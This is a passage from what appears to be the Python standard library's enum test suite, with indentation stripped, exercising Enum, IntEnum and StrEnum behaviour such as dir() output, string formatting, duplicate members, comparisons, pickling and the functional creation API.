C = 3
D = 2
F = 0
self.Grades = Grades
class Directional(str, Enum):
EAST = 'east'
WEST = 'west'
NORTH = 'north'
SOUTH = 'south'
self.Directional = Directional
from datetime import date
class Holiday(date, Enum):
NEW_YEAR = 2013, 1, 1
IDES_OF_MARCH = 2013, 3, 15
self.Holiday = Holiday
def test_dir_on_class(self):
Season = self.Season
self.assertEqual(
set(dir(Season)),
set(['__class__', '__doc__', '__members__', '__module__',
'SPRING', 'SUMMER', 'AUTUMN', 'WINTER']),
)
def test_dir_on_item(self):
Season = self.Season
self.assertEqual(
set(dir(Season.WINTER)),
set(['__class__', '__doc__', '__module__', 'name', 'value']),
)
def test_dir_with_added_behavior(self):
class Test(Enum):
this = 'that'
these = 'those'
def wowser(self):
return ("Wowser! I'm %s!" % self.name)
self.assertEqual(
set(dir(Test)),
set(['__class__', '__doc__', '__members__', '__module__', 'this', 'these']),
)
self.assertEqual(
set(dir(Test.this)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'wowser']),
)
def test_dir_on_sub_with_behavior_on_super(self):
# see issue22506
class SuperEnum(Enum):
def invisible(self):
return "did you see me?"
class SubEnum(SuperEnum):
sample = 5
self.assertEqual(
set(dir(SubEnum.sample)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']),
)
def test_dir_on_sub_with_behavior_including_instance_dict_on_super(self):
# see issue40084
class SuperEnum(IntEnum):
def __new__(cls, value, description=""):
obj = int.__new__(cls, value)
obj._value_ = value
obj.description = description
return obj
class SubEnum(SuperEnum):
sample = 5
self.assertTrue({'description'} <= set(dir(SubEnum.sample)))
def test_enum_in_enum_out(self):
Season = self.Season
self.assertIs(Season(Season.WINTER), Season.WINTER)
def test_enum_value(self):
Season = self.Season
self.assertEqual(Season.SPRING.value, 1)
def test_intenum_value(self):
self.assertEqual(IntStooges.CURLY.value, 2)
def test_enum(self):
Season = self.Season
lst = list(Season)
self.assertEqual(len(lst), len(Season))
self.assertEqual(len(Season), 4, Season)
self.assertEqual(
[Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst)
for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1):
e = Season(i)
self.assertEqual(e, getattr(Season, season))
self.assertEqual(e.value, i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, season)
self.assertIn(e, Season)
self.assertIs(type(e), Season)
self.assertIsInstance(e, Season)
self.assertEqual(str(e), 'Season.' + season)
self.assertEqual(
repr(e),
'<Season.{0}: {1}>'.format(season, i),
)
def test_value_name(self):
Season = self.Season
self.assertEqual(Season.SPRING.name, 'SPRING')
self.assertEqual(Season.SPRING.value, 1)
with self.assertRaises(AttributeError):
Season.SPRING.name = 'invierno'
with self.assertRaises(AttributeError):
Season.SPRING.value = 2
def test_changing_member(self):
Season = self.Season
with self.assertRaises(AttributeError):
Season.WINTER = 'really cold'
def test_attribute_deletion(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
def spam(cls):
pass
self.assertTrue(hasattr(Season, 'spam'))
del Season.spam
self.assertFalse(hasattr(Season, 'spam'))
with self.assertRaises(AttributeError):
del Season.SPRING
with self.assertRaises(AttributeError):
del Season.DRY
with self.assertRaises(AttributeError):
del Season.SPRING.name
def test_bool_of_class(self):
class Empty(Enum):
pass
self.assertTrue(bool(Empty))
def test_bool_of_member(self):
class Count(Enum):
zero = 0
one = 1
two = 2
for member in Count:
self.assertTrue(bool(member))
def test_invalid_names(self):
with self.assertRaises(ValueError):
class Wrong(Enum):
mro = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_create_= 11
with self.assertRaises(ValueError):
class Wrong(Enum):
_get_mixins_ = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_find_new_ = 1
with self.assertRaises(ValueError):
class Wrong(Enum):
_any_name_ = 9
def test_bool(self):
# plain Enum members are always True
class Logic(Enum):
true = True
false = False
self.assertTrue(Logic.true)
self.assertTrue(Logic.false)
# unless overridden
class RealLogic(Enum):
true = True
false = False
def __bool__(self):
return bool(self._value_)
self.assertTrue(RealLogic.true)
self.assertFalse(RealLogic.false)
# mixed Enums depend on mixed-in type
class IntLogic(int, Enum):
true = 1
false = 0
self.assertTrue(IntLogic.true)
self.assertFalse(IntLogic.false)
def test_contains(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
with self.assertRaises(TypeError):
3 in Season
with self.assertRaises(TypeError):
'AUTUMN' in Season
val = Season(3)
self.assertIn(val, Season)
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
def test_comparisons(self):
Season = self.Season
with self.assertRaises(TypeError):
Season.SPRING < Season.WINTER
with self.assertRaises(TypeError):
Season.SPRING > 4
self.assertNotEqual(Season.SPRING, 1)
class Part(Enum):
SPRING = 1
CLIP = 2
BARREL = 3
self.assertNotEqual(Season.SPRING, Part.SPRING)
with self.assertRaises(TypeError):
Season.SPRING < Part.CLIP
def test_enum_duplicates(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = FALL = 3
WINTER = 4
ANOTHER_SPRING = 1
lst = list(Season)
self.assertEqual(
lst,
[Season.SPRING, Season.SUMMER,
Season.AUTUMN, Season.WINTER,
])
self.assertIs(Season.FALL, Season.AUTUMN)
self.assertEqual(Season.FALL.value, 3)
self.assertEqual(Season.AUTUMN.value, 3)
self.assertIs(Season(3), Season.AUTUMN)
self.assertIs(Season(1), Season.SPRING)
self.assertEqual(Season.FALL.name, 'AUTUMN')
self.assertEqual(
[k for k,v in Season.__members__.items() if v.name != k],
['FALL', 'ANOTHER_SPRING'],
)
def test_duplicate_name(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
red = 4
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
def red(self):
return 'red'
with self.assertRaises(TypeError):
class Color(Enum):
@property
def red(self):
return 'redder'
red = 1
green = 2
blue = 3
def test_reserved__sunder_(self):
with self.assertRaisesRegex(
ValueError,
"_sunder_ names, such as '_bad_', are reserved",
):
class Bad(Enum):
_bad_ = 1
def test_enum_with_value_name(self):
class Huh(Enum):
name = 1
value = 2
self.assertEqual(
list(Huh),
[Huh.name, Huh.value],
)
self.assertIs(type(Huh.name), Huh)
self.assertEqual(Huh.name.name, 'name')
self.assertEqual(Huh.name.value, 1)
def test_format_enum(self):
Season = self.Season
self.assertEqual('{}'.format(Season.SPRING),
'{}'.format(str(Season.SPRING)))
self.assertEqual( '{:}'.format(Season.SPRING),
'{:}'.format(str(Season.SPRING)))
self.assertEqual('{:20}'.format(Season.SPRING),
'{:20}'.format(str(Season.SPRING)))
self.assertEqual('{:^20}'.format(Season.SPRING),
'{:^20}'.format(str(Season.SPRING)))
self.assertEqual('{:>20}'.format(Season.SPRING),
'{:>20}'.format(str(Season.SPRING)))
self.assertEqual('{:<20}'.format(Season.SPRING),
'{:<20}'.format(str(Season.SPRING)))
def test_str_override_enum(self):
class EnumWithStrOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
self.assertEqual(str(EnumWithStrOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrOverrides.one), 'Str!')
def test_format_override_enum(self):
class EnumWithFormatOverride(Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'Format!!'
self.assertEqual(str(EnumWithFormatOverride.one), 'EnumWithFormatOverride.one')
self.assertEqual('{}'.format(EnumWithFormatOverride.one), 'Format!!')
def test_str_and_format_override_enum(self):
class EnumWithStrFormatOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(EnumWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrFormatOverrides.one), 'Format!')
def test_str_override_mixin(self):
class MixinEnumWithStrOverride(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Overridden!'
self.assertEqual(str(MixinEnumWithStrOverride.one), 'Overridden!')
self.assertEqual('{}'.format(MixinEnumWithStrOverride.one), 'Overridden!')
def test_str_and_format_override_mixin(self):
class MixinWithStrFormatOverrides(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(MixinWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(MixinWithStrFormatOverrides.one), 'Format!')
def test_format_override_mixin(self):
class TestFloat(float, Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'TestFloat success!'
self.assertEqual(str(TestFloat.one), 'TestFloat.one')
self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!')
def assertFormatIsValue(self, spec, member):
self.assertEqual(spec.format(member), spec.format(member.value))
def test_format_enum_date(self):
Holiday = self.Holiday
self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH)
def test_format_enum_float(self):
Konstants = self.Konstants
self.assertFormatIsValue('{}', Konstants.TAU)
self.assertFormatIsValue('{:}', Konstants.TAU)
self.assertFormatIsValue('{:20}', Konstants.TAU)
self.assertFormatIsValue('{:^20}', Konstants.TAU)
self.assertFormatIsValue('{:>20}', Konstants.TAU)
self.assertFormatIsValue('{:<20}', Konstants.TAU)
self.assertFormatIsValue('{:n}', Konstants.TAU)
self.assertFormatIsValue('{:5.2}', Konstants.TAU)
self.assertFormatIsValue('{:f}', Konstants.TAU)
def test_format_enum_int(self):
Grades = self.Grades
self.assertFormatIsValue('{}', Grades.C)
self.assertFormatIsValue('{:}', Grades.C)
self.assertFormatIsValue('{:20}', Grades.C)
self.assertFormatIsValue('{:^20}', Grades.C)
self.assertFormatIsValue('{:>20}', Grades.C)
self.assertFormatIsValue('{:<20}', Grades.C)
self.assertFormatIsValue('{:+}', Grades.C)
self.assertFormatIsValue('{:08X}', Grades.C)
self.assertFormatIsValue('{:b}', Grades.C)
def test_format_enum_str(self):
Directional = self.Directional
self.assertFormatIsValue('{}', Directional.WEST)
self.assertFormatIsValue('{:}', Directional.WEST)
self.assertFormatIsValue('{:20}', Directional.WEST)
self.assertFormatIsValue('{:^20}', Directional.WEST)
self.assertFormatIsValue('{:>20}', Directional.WEST)
self.assertFormatIsValue('{:<20}', Directional.WEST)
def test_object_str_override(self):
class Colors(Enum):
RED, GREEN, BLUE = 1, 2, 3
def __repr__(self):
return "test.%s" % (self._name_, )
__str__ = object.__str__
self.assertEqual(str(Colors.RED), 'test.RED')
def test_enum_str_override(self):
class MyStrEnum(Enum):
def __str__(self):
return 'MyStr'
class MyMethodEnum(Enum):
def hello(self):
return 'Hello! My name is %s' % self.name
class Test1Enum(MyMethodEnum, int, MyStrEnum):
One = 1
Two = 2
self.assertTrue(Test1Enum._member_type_ is int)
self.assertEqual(str(Test1Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
#
class Test2Enum(MyStrEnum, MyMethodEnum):
One = 1
Two = 2
self.assertEqual(str(Test2Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
def test_inherited_data_type(self):
class HexInt(int):
def __repr__(self):
return hex(self)
class MyEnum(HexInt, enum.Enum):
A = 1
B = 2
C = 3
self.assertEqual(repr(MyEnum.A), '<MyEnum.A: 0x1>')
def test_too_many_data_types(self):
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(str, int, Enum):
One = 1
class MyStr(str):
def hello(self):
return 'hello, %s' % self
class MyInt(int):
def repr(self):
return hex(self)
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(MyStr, MyInt, Enum):
One = 1
def test_hash(self):
Season = self.Season
dates = {}
dates[Season.WINTER] = '1225'
dates[Season.SPRING] = '0315'
dates[Season.SUMMER] = '0704'
dates[Season.AUTUMN] = '1031'
self.assertEqual(dates[Season.AUTUMN], '1031')
def test_intenum_from_scratch(self):
class phy(int, Enum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_intenum_inherited(self):
class IntEnum(int, Enum):
pass
class phy(IntEnum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_from_scratch(self):
class phy(float, Enum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_inherited(self):
class FloatEnum(float, Enum):
pass
class phy(FloatEnum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_strenum_from_scratch(self):
class phy(str, Enum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_strenum_inherited_methods(self):
class phy(StrEnum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
self.assertEqual(phy.pi.upper(), 'PI')
self.assertEqual(phy.tau.count('a'), 1)
def test_intenum(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c')
self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2])
lst = list(WeekDay)
self.assertEqual(len(lst), len(WeekDay))
self.assertEqual(len(WeekDay), 7)
target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY'
target = target.split()
for i, weekday in enumerate(target, 1):
e = WeekDay(i)
self.assertEqual(e, i)
self.assertEqual(int(e), i)
self.assertEqual(e.name, weekday)
self.assertIn(e, WeekDay)
self.assertEqual(lst.index(e)+1, i)
self.assertTrue(0 < e < 8)
self.assertIs(type(e), WeekDay)
self.assertIsInstance(e, int)
self.assertIsInstance(e, Enum)
def test_intenum_duplicates(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = TEUSDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY)
self.assertEqual(WeekDay(3).name, 'TUESDAY')
self.assertEqual([k for k,v in WeekDay.__members__.items()
if v.name != k], ['TEUSDAY', ])
def test_intenum_from_bytes(self):
self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE)
with self.assertRaises(ValueError):
IntStooges.from_bytes(b'\x00\x05', 'big')
def test_floatenum_fromhex(self):
h = float.hex(FloatStooges.MOE.value)
self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE)
h = float.hex(FloatStooges.MOE.value + 0.01)
with self.assertRaises(ValueError):
FloatStooges.fromhex(h)
def test_pickle_enum(self):
if isinstance(Stooges, Exception):
raise Stooges
test_pickle_dump_load(self.assertIs, Stooges.CURLY)
test_pickle_dump_load(self.assertIs, Stooges)
def test_pickle_int(self):
if isinstance(IntStooges, Exception):
raise IntStooges
test_pickle_dump_load(self.assertIs, IntStooges.CURLY)
test_pickle_dump_load(self.assertIs, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertIs, FloatStooges.CURLY)
test_pickle_dump_load(self.assertIs, FloatStooges)
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertIs, Answer.him)
test_pickle_dump_load(self.assertIs, Answer)
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertIs, Question.who)
test_pickle_dump_load(self.assertIs, Question)
def test_enum_function_with_qualname(self):
if isinstance(Theory, Exception):
raise Theory
self.assertEqual(Theory.__qualname__, 'spanish_inquisition')
def test_class_nested_enum_and_pickle_protocol_four(self):
# would normally just have this directly in the class namespace
class NestedEnum(Enum):
twigs = 'common'
shiny = 'rare'
self.__class__.NestedEnum = NestedEnum
self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__
test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs)
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
def test_exploding_pickle(self):
BadPickle = Enum(
'BadPickle', 'dill sweet bread-n-butter', module=__name__)
globals()['BadPickle'] = BadPickle
# now break BadPickle to test exception raising
enum._make_class_unpicklable(BadPickle)
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertIs(Period(2), Period.noon)
self.assertIs(getattr(Period, 'night'), Period.night)
self.assertIs(Period['morning'], Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__eq__'))
def test_iteration_order(self):
class Season(Enum):
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_reversed_iteration_order(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_programmatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
OrderedDict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, 'Guido van Rossum')
self.assertTrue(Name.BDFL, Name('Guido van Rossum'))
self.assertIs(Name.BDFL, getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertIs, Name.BDFL)
def test_extending(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
with self.assertRaisesRegex(TypeError, "EvenMoreColor: cannot extend enumeration 'Color'"):
class EvenMoreColor(Color, IntEnum):
chartruese = 7
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertIsNot(type(whatever.really), whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
with self.assertRaises(TypeError):
class Wrong(Enum, str):
NotHere = 'error before this point'
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.female), Monochrome.white)
def test_mixed_enum_in_call_2(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.male), Monochrome.black)
def test_flufl_enum(self):
class Fluflnum(Enum):
def __int__(self):
return int(self.value)
class MailManOptions(Fluflnum):
option1 = 1
option2 = 2
option3 = 3
self.assertEqual(int(MailManOptions.option1), 1)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertIs(Number.one._member_type_, int)
self.assertIs(Number._member_type_, int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertIs(String.yarn._member_type_, str)
self.assertIs(String._member_type_, str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertIs(Plain.vanilla._member_type_, object)
self.assertIs(Plain._member_type_, object)
def test_no_such_enum_member(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
Color(4)
with self.assertRaises(KeyError):
Color['chartreuse']
def test_new_repr(self):
class Color(Enum):
red = 1
green = 2
blue = 3
def __repr__(self):
return "don't you just love shades of %s?" % self.name
self.assertEqual(
repr(Color.blue),
"don't you just love shades of blue?",
)
def test_inherited_repr(self):
class MyEnum(Enum):
def __repr__(self):
return "My name is %s." % self.name
class MyIntEnum(int, MyEnum):
this = 1
that = 2
theother = 3
self.assertEqual(repr(MyIntEnum.that), "My name is that.")
def test_multiple_mixin_mro(self):
class auto_enum(type(Enum)):
def __new__(metacls, cls, bases, classdict):
temp = type(classdict)()
temp._cls_name = cls
names = set(classdict._member_names)
i = 0
for k in classdict._member_names:
v = classdict[k]
if v is Ellipsis:
v = i
else:
i = v
i += 1
temp[k] = v
for k, v in classdict.items():
if k not in names:
temp[k] = v
return super(auto_enum, metacls).__new__(
metacls, cls, bases, temp)
class AutoNumberedEnum(Enum, metaclass=auto_enum):
pass
class AutoIntEnum(IntEnum, metaclass=auto_enum):
pass
class TestAutoNumber(AutoNumberedEnum):
a = ...
b = 3
c = ...
class TestAutoInt(AutoIntEnum):
a = ...
b = 3
c = ...
def test_subclasses_with_getnewargs(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs__(self):
return self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_getnewargs_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs_ex__(self):
return self._args, {}
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
